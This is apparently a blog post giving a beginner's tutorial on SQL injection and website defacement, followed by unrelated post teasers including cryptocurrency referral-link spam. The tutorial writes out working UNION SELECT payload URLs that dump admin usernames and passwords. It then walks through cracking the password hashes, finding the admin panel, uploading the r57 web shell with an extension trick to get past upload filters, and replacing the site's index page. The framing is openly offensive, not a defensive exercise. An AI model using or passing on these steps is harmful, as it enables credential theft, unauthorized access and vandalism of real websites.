Lumaktaw sa pangunahing content

Sqli and Defacement


SQL Injection And Defacement For Beginners Complete Tutorial

1. First you need to find vulnerable website.

http://sql-vuln-site.com/index.php?id=15

2. Now you need to find columns.

http://sql-vuln-site.com/index.php?id=15 order by 1-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 2-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 3-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 4-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 5-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 6-- ( error )

Error’s looks like this:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’39′ at line 1
database query failure- SELECT * FROM texecom_sidemenu WHERE id=’39

3. Now Select columns
Columns is 5

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT 1,2,3,4,5–

4. Finding version.
So if you not go the bold number 1 , 2, 3 , 4 one of them you will try all.
I choose 1

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT @@version,2,3,4,5–

you got the version like this:
5.0.32-Debian_7etch11-log

5. Finding Tables
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT table_name,2,3,4,5 from information_schema.tables–
And you will got tables like this:
PRODUCTS , ADMINS , and others
So must be there table by name: admin , users , user , login , client.

6. Finding Columns in the Table ADMINS.

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT column_name,2,3,4,5 from information_schema.columns where table_name=char()–

We found ADMINS table now go to ASCII web and convert ADMINS
You will got this ADMINS
Remove &# and replace ; to ,
Like this: 65,68,77,73,78,83
You put table_name=char(65,68,77,73,78,83)–

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT column_name,2,3,4,5 from information_schema.columns where table_name=char(65,68,77,73,78,83)–

And you will got the columns in table ADMINS
There need to have columns with names: username and password

7. Getting username and password.

Now we put concat(username,0x3a,password) and admins

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT concat(username,0x3a,password),2,3,4,5 from admins–

( 0x3a is ASCII )
8. Finded username and password
So you found the username and password
if the password is hash like this: 2510c39011c5be704182423e3a695e91
you will need to use MD5 Hash Online Crackers.
If password is not hash you are lucky and now you need to find admin panel.

9. Finding Admin Panel

Open the tool Admin Finder
Put the website in the bellow and click Scan.
So you found admin panel and it looks like this http://sql-vuln-site.com/admin/login.php

You open website and there have Username: Password:
Put username and password what you got.
Done you login in Admin Panel lets upload shell and deface.

10. Uploading Shell and Add Deface

In Admin Panel you will search categories or anything where you can upload a file or picture.
When you found, you will download shell from the website who i tell you before start tutorial so you will try to upload your shell like: r57.php when you upload it you will see the link of the upload and open it like this:

http://sql-vuln-site.com/upload/r57.php

If can’t upload r57.php change it to r57.jpg.php or r57.txt and try!

You need to make a deface page in html and put in the website
So you open the shell,you will found a file index.php and click on it and there you will remove the php code from index and put your html code.

Congratulations you deface the website.

Mga Komento

Mga sikat na post sa blog na ito

EARN BITCOIN

MALAKI NA HALAGA NG BITCOIN SA PHP KAYA EARN NA :) 1 BITCOIN = 500,000+Php HEY BTC AND SATOSHI EARNERS! HERE IS MY MOST TRUSTED, LEGIT SITE'S AND APP'S  TO EARN. 3 APP's FOR EARNING BITCOIN FREE 1,000 SATOSHI IF YOU USE MY CODE ' 2DVRYJ' >  https://play.google.com/store/apps/details?id=com.claimbitcoinnetwork.sst >  https://play.google.com/store/apps/details?id=com.claimbitcoinnetwork.wos >  https://play.google.com/store/apps/details?id=tech.jplabs.bitcoin EARN LOAD USING MESSENGER > m.me/neargroup?ref=R_II6ig1 FREE 300PHP UPON SIGN UP > https://affiliate.paysbook.co/auth/register?id=Mryosojmlf EARN BITCOIN,LITECOIN,DOGECOIN,DASH COIN MAIN SITE:  coinpot.co FAUCET SITE'S: > http://moonbit.co.in/?ref=8e315d2026b4 (BITCOIN) > http://moondoge.co.in/?ref=7d9dbc153226 (DOGECOIN) > http://moonliteco.in/?ref=7b7bb9509913 (LITECOIN) > http://moondash.co.in/?ref=87DACF2841DD (DASH) > http://moonb.ch/?ref=62497

Hiniling daw ni Kitty Duterte sa Pangulo na ipatanggal ang K-12 program

Hiniling daw ni Kitty Duterte sa Pangulo na ipatanggal ang K-12 program Manila Philippines, Hiniling umano ni Presidential Daughter Kitty Duterte sa kanyang ama na si Pangulong Rodrigo Duterte na ipatanggal ang K-12 program sa paaralan. Alamin at panoorin ang buong report mula sa news5. Panoorin ang video: Payag ba kayo na tanggalin ang K-12 program?

What does Refresh actually do?

You’ve probably seen that when you right-click on your Windows desktop or inside windows folder, you notice an option dubbed Refresh in the menu settings. Many users have a habit of constantly refreshing Windows for no reason. Everything on your desktop is a static frame. Let’s take an example of a video— Each video have many images coordinated in an order and they are projected on the screen at a specific rate i.e. 48 images/frames per second. All of that called FPS (frames per second) is a measure of how motion video is displayed. The term applies equally to film video and digital video. The refresh option marks all the components of the screen as sloppy, so, the entire screen is recreated in the next frame and represented on your monitor. That’s the original function of the Refresh option in Windows. Generally, F5 option is a method of describing the process of reloading or updating what is being displayed. Refresh simply redraws the Desktop. So if you had new files tha